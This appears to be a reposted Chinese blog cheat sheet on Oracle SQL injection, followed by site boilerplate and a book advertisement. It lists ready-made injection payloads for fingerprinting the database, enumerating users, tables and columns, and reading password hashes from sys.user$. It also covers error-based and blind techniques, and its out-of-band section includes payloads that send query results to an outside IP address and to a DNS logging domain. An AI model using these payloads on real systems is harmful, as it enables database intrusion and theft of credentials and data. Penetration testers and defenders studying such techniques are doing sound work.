内容简介:decode(条件,值1,值1结果,值2,值2结果,。。。值n,值n结果,默认值)条件和那个值相等就返回那个值的结果instr(字符串,子串)
0x00 判断数据库类型
-
Oracle有一些自带的表:dual、user_tables
id=45 and (select count(*) from user_tables)>0-- id=45 and (select count(*) from dual)>0--
-
利用自带的一些函数:譬如utl_http.request 这些
-
利用Oracle的字符连接符:CHR(97)||CHR(110)||CHR(100)||CHR(32)||CHR(49)||CHR(61)||CHR(49)
0x01 基本信息获取
-
查看sid
select instance_name from v$instance;
-
查看数据库版本:
select banner from v$version where rownum=1; select banner from sys.v_$version where rownum=1;
-
查看用户:
select user from dual; --当前用户 select username from user_users; --当前用户 select username from all_users; --查看所有用户 select username from dba_users; --查看所有用户(需要有权限)
-
查看当前用户角色:
select role from session_roles;
-
查看数据库用户名和密码:
select name, password, astatus from sys.user$; --需要权限
-
通过注入获取数据
--列database select global_name from global_name; select sys.database_name from dual; select name from v$database; select instance_name from v$instance; --列owner select distinct owner from all_tables; --列owner的tables select table_name from all_tables where owner='UTEST'; --列tables的columns select column_name from all_tab_columns where table_name='TUSER'; select column_name from all_tab_cols where table_name='TUSER'; --列tablespace select tablespace_name from user_tablespaces; --列tablespace的tables select table_name from user_tables where tablespace_name='DB_TEST_DATA'; --列tables的columns select column_name from user_tab_columns where table_name='TUSER';
0x02 UNION query注入
-
存在注入
-
判断列数
-
尝试union select 依次判断字段类型(下图判断出第二个字段是字符型)
-
得到表名
得到表的个数 得到第一个表的表名 得到第二个表的表名 -
得到第一个表的字段
-
得到第一个表的数据
0x03 error-based注入
-
ctxsys.drithsx.sn
-
dbms_xdb_version.checkin
-
dbms_xdb_version.makeversioned
-
dbms_xdb_version.uncheckout
-
dbms_utility.sqlid_to_sqlhash
-
utl_inaddr.get_host_name(在11g以后需要是超级用户或已授予网络访问权限的用户才能使用)
0x04 boolean-based blind注入
- decode
decode(条件,值1,值1结果,值2,值2结果,。。。值n,值n结果,默认值)
条件和那个值相等就返回那个值的结果
- instr
instr(字符串,子串)
从一个字符串中查找指定子串的位置,这里一直将位置置为1
0x05 无回显注入
-
web服务接收结果
select * from utest.msg where id=2 and 1=utl_http.request('http://59.108.35.198:8888/'||(select user from dual));
-
dns服务接收结果
select * from utest.msg where id=2 and (select utl_inaddr.get_host_address((select user from dual)||'.dnslog.wyb0.com') from dual) is not null;
Reference(侵删):
以上所述就是小编给大家介绍的《SQL注入小结(Oracle)》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
高效程序员的45个习惯
Venkat Subramaniam、Andy Hunt / 钱安川、郑柯 / 人民邮电出版社 / 2010-01 / 35.00元
“书中‘切身感受’的内容非常有价值——通过它我们可以做到学有所思,思有所悟,悟有所行。” ——Nathaniel T. Schutta,《Ajax基础教程》作者 “此书通过常理和经验,阐述了为什么你应该在项目中使用敏捷方法。最难得的是,这些行之有效的实战经验,竟然从一本书中得到了。” ——Matthew Johnson,软件工程师 十年来,软件行业发生了翻天覆地的变化。敏捷......一起来看看 《高效程序员的45个习惯》 这本书的介绍吧!